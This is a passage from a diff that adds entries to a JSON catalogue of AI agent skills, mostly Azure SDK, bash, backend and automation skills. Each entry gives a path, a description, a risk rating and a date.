+ "description": "Azure Key Vault SDK for Python. Use for secrets, keys, and certificates management with secure storage.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-keyvault-secrets-rust",
+ "path": "skills/azure-keyvault-secrets-rust",
+ "category": "uncategorized",
+ "name": "azure-keyvault-secrets-rust",
+ "description": "Azure Key Vault Secrets SDK for Rust. Use for storing and retrieving secrets, passwords, and API keys. Triggers: \"keyvault secrets rust\", \"SecretClient rust\", \"get secret rust\", \"set secret rust\".",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-keyvault-secrets-ts",
+ "path": "skills/azure-keyvault-secrets-ts",
+ "category": "uncategorized",
+ "name": "azure-keyvault-secrets-ts",
+ "description": "Manage secrets using Azure Key Vault Secrets SDK for JavaScript (@azure/keyvault-secrets). Use when storing and retrieving application secrets or configuration values.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-maps-search-dotnet",
+ "path": "skills/azure-maps-search-dotnet",
+ "category": "uncategorized",
+ "name": "azure-maps-search-dotnet",
+ "description": "Azure Maps SDK for .NET. Location-based services including geocoding, routing, rendering, geolocation, and weather. Use for address search, directions, map tiles, IP geolocation, and weather data.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-messaging-webpubsub-java",
+ "path": "skills/azure-messaging-webpubsub-java",
+ "category": "uncategorized",
+ "name": "azure-messaging-webpubsub-java",
+ "description": "Build real-time web applications with Azure Web PubSub SDK for Java. Use when implementing WebSocket-based messaging, live updates, chat applications, or server-to-client push notifications.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-messaging-webpubsubservice-py",
+ "path": "skills/azure-messaging-webpubsubservice-py",
+ "category": "uncategorized",
+ "name": "azure-messaging-webpubsubservice-py",
+ "description": "Azure Web PubSub Service SDK for Python. Use for real-time messaging, WebSocket connections, and pub/sub patterns.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-mgmt-apicenter-dotnet",
+ "path": "skills/azure-mgmt-apicenter-dotnet",
+ "category": "uncategorized",
+ "name": "azure-mgmt-apicenter-dotnet",
+ "description": "Azure API Center SDK for .NET. Centralized API inventory management with governance, versioning, and discovery.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-mgmt-apicenter-py",
+ "path": "skills/azure-mgmt-apicenter-py",
+ "category": "uncategorized",
+ "name": "azure-mgmt-apicenter-py",
+ "description": "Azure API Center Management SDK for Python. Use for managing API inventory, metadata, and governance across your organization.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-mgmt-apimanagement-dotnet",
+ "path": "skills/azure-mgmt-apimanagement-dotnet",
+ "category": "uncategorized",
+ "name": "azure-mgmt-apimanagement-dotnet",
+ "description": "Azure Resource Manager SDK for API Management in .NET.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-mgmt-apimanagement-py",
+ "path": "skills/azure-mgmt-apimanagement-py",
+ "category": "uncategorized",
+ "name": "azure-mgmt-apimanagement-py",
+ "description": "Azure API Management SDK for Python. Use for managing APIM services, APIs, products, subscriptions, and policies.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-mgmt-applicationinsights-dotnet",
+ "path": "skills/azure-mgmt-applicationinsights-dotnet",
+ "category": "uncategorized",
+ "name": "azure-mgmt-applicationinsights-dotnet",
+ "description": "Azure Application Insights SDK for .NET. Application performance monitoring and observability resource management.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-mgmt-arizeaiobservabilityeval-dotnet",
+ "path": "skills/azure-mgmt-arizeaiobservabilityeval-dotnet",
+ "category": "uncategorized",
+ "name": "azure-mgmt-arizeaiobservabilityeval-dotnet",
+ "description": "Azure Resource Manager SDK for Arize AI Observability and Evaluation (.NET).",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-mgmt-botservice-dotnet",
+ "path": "skills/azure-mgmt-botservice-dotnet",
+ "category": "uncategorized",
+ "name": "azure-mgmt-botservice-dotnet",
+ "description": "Azure Resource Manager SDK for Bot Service in .NET. Management plane operations for creating and managing Azure Bot resources, channels (Teams, DirectLine, Slack), and connection settings.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-mgmt-botservice-py",
+ "path": "skills/azure-mgmt-botservice-py",
+ "category": "uncategorized",
+ "name": "azure-mgmt-botservice-py",
+ "description": "Azure Bot Service Management SDK for Python. Use for creating, managing, and configuring Azure Bot Service resources.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-mgmt-fabric-dotnet",
+ "path": "skills/azure-mgmt-fabric-dotnet",
+ "category": "uncategorized",
+ "name": "azure-mgmt-fabric-dotnet",
+ "description": "Azure Resource Manager SDK for Fabric in .NET.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-mgmt-fabric-py",
+ "path": "skills/azure-mgmt-fabric-py",
+ "category": "uncategorized",
+ "name": "azure-mgmt-fabric-py",
+ "description": "Azure Fabric Management SDK for Python. Use for managing Microsoft Fabric capacities and resources.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-mgmt-mongodbatlas-dotnet",
+ "path": "skills/azure-mgmt-mongodbatlas-dotnet",
+ "category": "uncategorized",
+ "name": "azure-mgmt-mongodbatlas-dotnet",
+ "description": "Manage MongoDB Atlas Organizations as Azure ARM resources using Azure.ResourceManager.MongoDBAtlas SDK. Use when creating, updating, listing, or deleting MongoDB Atlas organizations through Azure M...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-mgmt-weightsandbiases-dotnet",
+ "path": "skills/azure-mgmt-weightsandbiases-dotnet",
+ "category": "uncategorized",
+ "name": "azure-mgmt-weightsandbiases-dotnet",
+ "description": "Azure Weights & Biases SDK for .NET. ML experiment tracking and model management via Azure Marketplace. Use for creating W&B instances, managing SSO, marketplace integration, and ML observability.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-microsoft-playwright-testing-ts",
+ "path": "skills/azure-microsoft-playwright-testing-ts",
+ "category": "uncategorized",
+ "name": "azure-microsoft-playwright-testing-ts",
+ "description": "Run Playwright tests at scale using Azure Playwright Workspaces (formerly Microsoft Playwright Testing). Use when scaling browser tests across cloud-hosted browsers, integrating with CI/CD pipeline...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-monitor-ingestion-java",
+ "path": "skills/azure-monitor-ingestion-java",
+ "category": "uncategorized",
+ "name": "azure-monitor-ingestion-java",
+ "description": "Azure Monitor Ingestion SDK for Java. Send custom logs to Azure Monitor via Data Collection Rules (DCR) and Data Collection Endpoints (DCE).",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-monitor-ingestion-py",
+ "path": "skills/azure-monitor-ingestion-py",
+ "category": "uncategorized",
+ "name": "azure-monitor-ingestion-py",
+ "description": "Azure Monitor Ingestion SDK for Python. Use for sending custom logs to Log Analytics workspace via Logs Ingestion API.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-monitor-opentelemetry-exporter-java",
+ "path": "skills/azure-monitor-opentelemetry-exporter-java",
+ "category": "uncategorized",
+ "name": "azure-monitor-opentelemetry-exporter-java",
+ "description": "Azure Monitor OpenTelemetry Exporter for Java. Export OpenTelemetry traces, metrics, and logs to Azure Monitor/Application Insights.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-monitor-opentelemetry-exporter-py",
+ "path": "skills/azure-monitor-opentelemetry-exporter-py",
+ "category": "uncategorized",
+ "name": "azure-monitor-opentelemetry-exporter-py",
+ "description": "Azure Monitor OpenTelemetry Exporter for Python. Use for low-level OpenTelemetry export to Application Insights.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-monitor-opentelemetry-py",
+ "path": "skills/azure-monitor-opentelemetry-py",
+ "category": "uncategorized",
+ "name": "azure-monitor-opentelemetry-py",
+ "description": "Azure Monitor OpenTelemetry Distro for Python. Use for one-line Application Insights setup with auto-instrumentation.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-monitor-opentelemetry-ts",
+ "path": "skills/azure-monitor-opentelemetry-ts",
+ "category": "uncategorized",
+ "name": "azure-monitor-opentelemetry-ts",
+ "description": "Instrument applications with Azure Monitor and OpenTelemetry for JavaScript (@azure/monitor-opentelemetry). Use when adding distributed tracing, metrics, and logs to Node.js applications with Appli...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-monitor-query-java",
+ "path": "skills/azure-monitor-query-java",
+ "category": "uncategorized",
+ "name": "azure-monitor-query-java",
+ "description": "Azure Monitor Query SDK for Java. Execute Kusto queries against Log Analytics workspaces and query metrics from Azure resources.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-monitor-query-py",
+ "path": "skills/azure-monitor-query-py",
+ "category": "uncategorized",
+ "name": "azure-monitor-query-py",
+ "description": "Azure Monitor Query SDK for Python. Use for querying Log Analytics workspaces and Azure Monitor metrics.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-postgres-ts",
+ "path": "skills/azure-postgres-ts",
+ "category": "uncategorized",
+ "name": "azure-postgres-ts",
+ "description": "Connect to Azure Database for PostgreSQL Flexible Server from Node.js/TypeScript using the pg (node-postgres) package.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-resource-manager-cosmosdb-dotnet",
+ "path": "skills/azure-resource-manager-cosmosdb-dotnet",
+ "category": "uncategorized",
+ "name": "azure-resource-manager-cosmosdb-dotnet",
+ "description": "Azure Resource Manager SDK for Cosmos DB in .NET.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-resource-manager-durabletask-dotnet",
+ "path": "skills/azure-resource-manager-durabletask-dotnet",
+ "category": "uncategorized",
+ "name": "azure-resource-manager-durabletask-dotnet",
+ "description": "Azure Resource Manager SDK for Durable Task Scheduler in .NET.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-resource-manager-mysql-dotnet",
+ "path": "skills/azure-resource-manager-mysql-dotnet",
+ "category": "uncategorized",
+ "name": "azure-resource-manager-mysql-dotnet",
+ "description": "Azure MySQL Flexible Server SDK for .NET. Database management for MySQL Flexible Server deployments.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-resource-manager-playwright-dotnet",
+ "path": "skills/azure-resource-manager-playwright-dotnet",
+ "category": "uncategorized",
+ "name": "azure-resource-manager-playwright-dotnet",
+ "description": "Azure Resource Manager SDK for Microsoft Playwright Testing in .NET.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-resource-manager-postgresql-dotnet",
+ "path": "skills/azure-resource-manager-postgresql-dotnet",
+ "category": "uncategorized",
+ "name": "azure-resource-manager-postgresql-dotnet",
+ "description": "Azure PostgreSQL Flexible Server SDK for .NET. Database management for PostgreSQL Flexible Server deployments.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-resource-manager-redis-dotnet",
+ "path": "skills/azure-resource-manager-redis-dotnet",
+ "category": "uncategorized",
+ "name": "azure-resource-manager-redis-dotnet",
+ "description": "Azure Resource Manager SDK for Redis in .NET.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-resource-manager-sql-dotnet",
+ "path": "skills/azure-resource-manager-sql-dotnet",
+ "category": "uncategorized",
+ "name": "azure-resource-manager-sql-dotnet",
+ "description": "Azure Resource Manager SDK for Azure SQL in .NET.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-search-documents-dotnet",
+ "path": "skills/azure-search-documents-dotnet",
+ "category": "uncategorized",
+ "name": "azure-search-documents-dotnet",
+ "description": "Azure AI Search SDK for .NET (Azure.Search.Documents). Use for building search applications with full-text, vector, semantic, and hybrid search.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-search-documents-py",
+ "path": "skills/azure-search-documents-py",
+ "category": "uncategorized",
+ "name": "azure-search-documents-py",
+ "description": "Azure AI Search SDK for Python. Use for vector search, hybrid search, semantic ranking, indexing, and skillsets.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-search-documents-ts",
+ "path": "skills/azure-search-documents-ts",
+ "category": "uncategorized",
+ "name": "azure-search-documents-ts",
+ "description": "Build search applications using Azure AI Search SDK for JavaScript (@azure/search-documents). Use when creating/managing indexes, implementing vector/hybrid search, semantic ranking, or building ag...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-security-keyvault-keys-dotnet",
+ "path": "skills/azure-security-keyvault-keys-dotnet",
+ "category": "uncategorized",
+ "name": "azure-security-keyvault-keys-dotnet",
+ "description": "Azure Key Vault Keys SDK for .NET. Client library for managing cryptographic keys in Azure Key Vault and Managed HSM. Use for key creation, rotation, encryption, decryption, signing, and verification.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-security-keyvault-keys-java",
+ "path": "skills/azure-security-keyvault-keys-java",
+ "category": "uncategorized",
+ "name": "azure-security-keyvault-keys-java",
+ "description": "Azure Key Vault Keys Java SDK for cryptographic key management. Use when creating, managing, or using RSA/EC keys, performing encrypt/decrypt/sign/verify operations, or working with HSM-backed keys.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-security-keyvault-secrets-java",
+ "path": "skills/azure-security-keyvault-secrets-java",
+ "category": "uncategorized",
+ "name": "azure-security-keyvault-secrets-java",
+ "description": "Azure Key Vault Secrets Java SDK for secret management. Use when storing, retrieving, or managing passwords, API keys, connection strings, or other sensitive configuration data.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-servicebus-dotnet",
+ "path": "skills/azure-servicebus-dotnet",
+ "category": "uncategorized",
+ "name": "azure-servicebus-dotnet",
+ "description": "Azure Service Bus SDK for .NET. Enterprise messaging with queues, topics, subscriptions, and sessions.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-servicebus-py",
+ "path": "skills/azure-servicebus-py",
+ "category": "uncategorized",
+ "name": "azure-servicebus-py",
+ "description": "Azure Service Bus SDK for Python messaging. Use for queues, topics, subscriptions, and enterprise messaging patterns.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-servicebus-ts",
+ "path": "skills/azure-servicebus-ts",
+ "category": "uncategorized",
+ "name": "azure-servicebus-ts",
+ "description": "Build messaging applications using Azure Service Bus SDK for JavaScript (@azure/service-bus). Use when implementing queues, topics/subscriptions, message sessions, dead-letter handling, or enterpri...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-speech-to-text-rest-py",
+ "path": "skills/azure-speech-to-text-rest-py",
+ "category": "uncategorized",
+ "name": "azure-speech-to-text-rest-py",
+ "description": "Azure Speech to Text REST API for short audio (Python). Use for simple speech recognition of audio files up to 60 seconds without the Speech SDK.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-storage-blob-java",
+ "path": "skills/azure-storage-blob-java",
+ "category": "uncategorized",
+ "name": "azure-storage-blob-java",
+ "description": "Build blob storage applications with Azure Storage Blob SDK for Java. Use when uploading, downloading, or managing files in Azure Blob Storage, working with containers, or implementing streaming da...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-storage-blob-py",
+ "path": "skills/azure-storage-blob-py",
+ "category": "uncategorized",
+ "name": "azure-storage-blob-py",
+ "description": "Azure Blob Storage SDK for Python. Use for uploading, downloading, listing blobs, managing containers, and blob lifecycle.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-storage-blob-rust",
+ "path": "skills/azure-storage-blob-rust",
+ "category": "uncategorized",
+ "name": "azure-storage-blob-rust",
+ "description": "Azure Blob Storage SDK for Rust. Use for uploading, downloading, and managing blobs and containers.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-storage-blob-ts",
+ "path": "skills/azure-storage-blob-ts",
+ "category": "uncategorized",
+ "name": "azure-storage-blob-ts",
+ "description": "Azure Blob Storage JavaScript/TypeScript SDK (@azure/storage-blob) for blob operations. Use for uploading, downloading, listing, and managing blobs and containers.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-storage-file-datalake-py",
+ "path": "skills/azure-storage-file-datalake-py",
+ "category": "uncategorized",
+ "name": "azure-storage-file-datalake-py",
+ "description": "Azure Data Lake Storage Gen2 SDK for Python. Use for hierarchical file systems, big data analytics, and file/directory operations.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-storage-file-share-py",
+ "path": "skills/azure-storage-file-share-py",
+ "category": "uncategorized",
+ "name": "azure-storage-file-share-py",
+ "description": "Azure Storage File Share SDK for Python. Use for SMB file shares, directories, and file operations in the cloud.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-storage-file-share-ts",
+ "path": "skills/azure-storage-file-share-ts",
+ "category": "uncategorized",
+ "name": "azure-storage-file-share-ts",
+ "description": "Azure File Share JavaScript/TypeScript SDK (@azure/storage-file-share) for SMB file share operations.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-storage-queue-py",
+ "path": "skills/azure-storage-queue-py",
+ "category": "uncategorized",
+ "name": "azure-storage-queue-py",
+ "description": "Azure Queue Storage SDK for Python. Use for reliable message queuing, task distribution, and asynchronous processing.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-storage-queue-ts",
+ "path": "skills/azure-storage-queue-ts",
+ "category": "uncategorized",
+ "name": "azure-storage-queue-ts",
+ "description": "Azure Queue Storage JavaScript/TypeScript SDK (@azure/storage-queue) for message queue operations. Use for sending, receiving, peeking, and deleting messages in queues.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "azure-web-pubsub-ts",
+ "path": "skills/azure-web-pubsub-ts",
+ "category": "uncategorized",
+ "name": "azure-web-pubsub-ts",
+ "description": "Build real-time messaging applications using Azure Web PubSub SDKs for JavaScript (@azure/web-pubsub, @azure/web-pubsub-client). Use when implementing WebSocket-based real-time features, pub/sub me...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "backend-architect",
+ "path": "skills/backend-architect",
+ "category": "uncategorized",
+ "name": "backend-architect",
+ "description": "Expert backend architect specializing in scalable API design, microservices architecture, and distributed systems.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "backend-dev-guidelines",
+ "path": "skills/backend-dev-guidelines",
+ "category": "uncategorized",
+ "name": "backend-dev-guidelines",
+ "description": "Opinionated backend development standards for Node.js + Express + TypeScript microservices. Covers layered architecture, BaseController pattern, dependency injection, Prisma repositories, Zod valid...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "backend-development-feature-development",
+ "path": "skills/backend-development-feature-development",
+ "category": "uncategorized",
+ "name": "backend-development-feature-development",
+ "description": "Orchestrate end-to-end backend feature development from requirements to deployment. Use when coordinating multi-phase feature delivery across teams and services.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "backend-security-coder",
+ "path": "skills/backend-security-coder",
+ "category": "uncategorized",
+ "name": "backend-security-coder",
+ "description": "Expert in secure backend coding practices specializing in input validation, authentication, and API security. Use PROACTIVELY for backend security implementations or security code reviews.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "backtesting-frameworks",
+ "path": "skills/backtesting-frameworks",
+ "category": "uncategorized",
+ "name": "backtesting-frameworks",
+ "description": "Build robust backtesting systems for trading strategies with proper handling of look-ahead bias, survivorship bias, and transaction costs. Use when developing trading algorithms, validating strateg...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "bamboohr-automation",
+ "path": "skills/bamboohr-automation",
+ "category": "uncategorized",
+ "name": "bamboohr-automation",
+ "description": "Automate BambooHR tasks via Rube MCP (Composio): employees, time-off, benefits, dependents, employee updates. Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "base",
+ "path": "skills/libreoffice/base",
+ "category": "database-processing",
+ "name": "base",
+ "description": "Database management, forms, reports, and data operations with LibreOffice Base.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "basecamp-automation",
+ "path": "skills/basecamp-automation",
+ "category": "uncategorized",
+ "name": "basecamp-automation",
+ "description": "Automate Basecamp project management, to-dos, messages, people, and to-do list organization via Rube MCP (Composio). Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "bash-defensive-patterns",
+ "path": "skills/bash-defensive-patterns",
+ "category": "uncategorized",
+ "name": "bash-defensive-patterns",
+ "description": "Master defensive Bash programming techniques for production-grade scripts. Use when writing robust shell scripts, CI/CD pipelines, or system utilities requiring fault tolerance and safety.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "bash-linux",
+ "path": "skills/bash-linux",
+ "category": "uncategorized",
+ "name": "bash-linux",
+ "description": "Bash/Linux terminal patterns. Critical commands, piping, error handling, scripting. Use when working on macOS or Linux systems.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "bash-pro",
+ "path": "skills/bash-pro",
+ "category": "uncategorized",
+ "name": "bash-pro",
+ "description": "Master of defensive Bash scripting for production automation, CI/CD\npipelines, and system utilities. Expert in safe, portable, and testable shell\nscripts.\n",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "bash-scripting",
+ "path": "skills/bash-scripting",
+ "category": "granular-workflow-bundle",
+ "name": "bash-scripting",
+ "description": "Bash scripting workflow for creating production-ready shell scripts with defensive patterns, error handling, and testing.",
+ "risk": "safe",
+ "source": "personal",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "bats-testing-patterns",
+ "path": "skills/bats-testing-patterns",
+ "category": "uncategorized",
+ "name": "bats-testing-patterns",
+ "description": "Master Bash Automated Testing System (Bats) for comprehensive shell script testing. Use when writing tests for shell scripts, CI/CD pipelines, or requiring test-driven development of shell utilities.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "bazel-build-optimization",
+ "path": "skills/bazel-build-optimization",
+ "category": "uncategorized",
+ "name": "bazel-build-optimization",
+ "description": "Optimize Bazel builds for large-scale monorepos. Use when configuring Bazel, implementing remote execution, or optimizing build performance for enterprise codebases.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "beautiful-prose",
+ "path": "skills/beautiful-prose",
+ "category": "uncategorized",
+ "name": "beautiful-prose",
+ "description": "Hard-edged writing style contract for timeless, forceful English prose without AI tics",
+ "risk": "safe",
+ "source": "https://github.com/SHADOWPR0/beautiful_prose",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "behavioral-modes",
+ "path": "skills/behavioral-modes",
+ "category": "uncategorized",
+ "name": "behavioral-modes",
+ "description": "AI operational modes (brainstorm, implement, debug, review, teach, ship, orchestrate). Use to adapt behavior based on task type.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "bevy-ecs-expert",
+ "path": "skills/bevy-ecs-expert",
+ "category": "uncategorized",
+ "name": "bevy-ecs-expert",
+ "description": "Master Bevy's Entity Component System (ECS) in Rust, covering Systems, Queries, Resources, and parallel scheduling.",
+ "risk": "safe",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "billing-automation",
+ "path": "skills/billing-automation",
+ "category": "uncategorized",
+ "name": "billing-automation",
+ "description": "Build automated billing systems for recurring payments, invoicing, subscription lifecycle, and dunning management. Use when implementing subscription billing, automating invoicing, or managing recu...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "binary-analysis-patterns",
+ "path": "skills/binary-analysis-patterns",
+ "category": "uncategorized",
+ "name": "binary-analysis-patterns",
+ "description": "Master binary analysis patterns including disassembly, decompilation, control flow analysis, and code pattern recognition. Use when analyzing executables, understanding compiled code, or performing...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "bitbucket-automation",
+ "path": "skills/bitbucket-automation",
+ "category": "uncategorized",
+ "name": "bitbucket-automation",
+ "description": "Automate Bitbucket repositories, pull requests, branches, issues, and workspace management via Rube MCP (Composio). Always search tools first for current schemas.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "blockchain-developer",
+ "path": "skills/blockchain-developer",
+ "category": "uncategorized",
+ "name": "blockchain-developer",
+ "description": "Build production-ready Web3 applications, smart contracts, and decentralized systems. Implements DeFi protocols, NFT platforms, DAOs, and enterprise blockchain integrations.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "blockrun",
+ "path": "skills/blockrun",
+ "category": "uncategorized",
+ "name": "blockrun",
+ "description": "Use when user needs capabilities Claude lacks (image generation, real-time X/Twitter data) or explicitly requests external models (\\\"blockrun\\\", \\\"use grok\\\", \\\"use gpt\\\", \\\"da...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "box-automation",
+ "path": "skills/box-automation",
+ "category": "uncategorized",
+ "name": "box-automation",
+ "description": "Automate Box cloud storage operations including file upload/download, search, folder management, sharing, collaborations, and metadata queries via Rube MCP (Composio). Always search tools first for...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "brainstorming",
+ "path": "skills/brainstorming",
+ "category": "uncategorized",
+ "name": "brainstorming",
+ "description": "Use before creative or constructive work (features, architecture, behavior). Transforms vague ideas into validated designs through disciplined reasoning and collaboration.",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "brand-guidelines-anthropic",
+ "path": "skills/brand-guidelines-anthropic",
+ "category": "uncategorized",
+ "name": "brand-guidelines-anthropic",
+ "description": "Applies Anthropic's official brand colors and typography to any sort of artifact that may benefit from having Anthropic's look-and-feel. Use it when brand colors or style guidelines, visual formatt...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "brand-guidelines-community",
+ "path": "skills/brand-guidelines-community",
+ "category": "uncategorized",
+ "name": "brand-guidelines-community",
+ "description": "Applies Anthropic's official brand colors and typography to any sort of artifact that may benefit from having Anthropic's look-and-feel. Use it when brand colors or style guidelines, visual formatt...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "brevo-automation",
+ "path": "skills/brevo-automation",
+ "category": "uncategorized",
+ "name": "brevo-automation",
+ "description": "Automate Brevo (Sendinblue) tasks via Rube MCP (Composio): manage email campaigns, create/edit templates, track senders, and monitor campaign performance. Always search tools first for current sche...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "broken-authentication",
+ "path": "skills/broken-authentication",
+ "category": "uncategorized",
+ "name": "broken-authentication",
+ "description": "This skill should be used when the user asks to \"test for broken authentication vulnerabilities\", \"assess session management security\", \"perform credential stuffing tests\", \"evaluate ...",
+ "risk": "unknown",
+ "source": "community",
+ "date_added": "2026-02-27"
+ },
+ {
+ "id": "browser-automation",
+ "path": "skills/browser-automation",
+ "category": "uncategorized",
+ "name": "browser-automation",
